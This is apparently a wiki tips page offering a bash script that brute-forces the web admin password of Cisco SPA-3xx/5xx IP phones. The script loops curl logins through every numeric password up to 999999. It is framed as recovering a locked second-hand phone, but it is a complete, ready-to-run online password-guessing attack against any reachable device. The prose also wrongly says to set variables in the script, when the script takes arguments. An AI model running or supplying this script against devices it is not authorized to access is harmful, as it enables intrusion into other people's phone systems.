Cisco SPA-3xx or SPA-5xx Brute Force Password Recovery

Save the script (below) as a BASH script on a Linux or Mac machine and use it to determine the password of a locked phone you may have purchased second hand.

NOTE: this script can take SEVERAL days! It works by doing a brute force attack against the phone to discover the password.

Once discovered, the script will record the password on the LAST line in a file it creates while running. The file will be called password.txt.

You can then use this password to unlock and then factory default the phone.

The script requires the LAN IP of the phone and serial number. You set these in two variables in the script before executing. Then have PATIENCE!

#!/bin/bash
#This script was written by John Rogers, K1WIZ.  The intention of this script is to recover the 
#admin password on a Cisco SPAxxx phone when the admin password is not known.  
#The script creates a file in the same directory called password.txt and when it finds the correct
#password, it writes it on the last line of the file and then the script dies.   The recovered 
#password can then be used to factory reset the phone.   

ip=$1       # IP Address of the phone on your LAN
serial=$2   # Serial Number of the Phone you are unlocking

# Both arguments are required
if [ $# -ne 2 ]; then
        echo "Usage: $0 <ip.address> <serial.number>"
        exit 1
fi
echo "Probing phone at IP: $ip and serial: $serial"
echo "writing results to password.txt, allow to run for several days, until script exits by itself!"
echo "password will be revealed in password.txt"

# Try every numeric password from 1 to 999999
for ((pass=1;pass<=999999;pass++)); do
        # The response is searched for the serial number; one matching line counts as a successful login
        flag=`/usr/bin/curl -s --anyauth -u admin:$pass "http://$ip/admin/#" | grep -i "$serial" | wc -l`

        if [ "$flag" -eq 1 ]; then
                echo "password is: " $pass >> password.txt
                exit 0;
        else
                echo "it aint" $pass >> password.txt
        fi
done

tt/tips.and.tricks/cisco.3xx.5xx.brute.force.password.recover.txt · Last modified: 2023/02/06 16:16 by kg6baj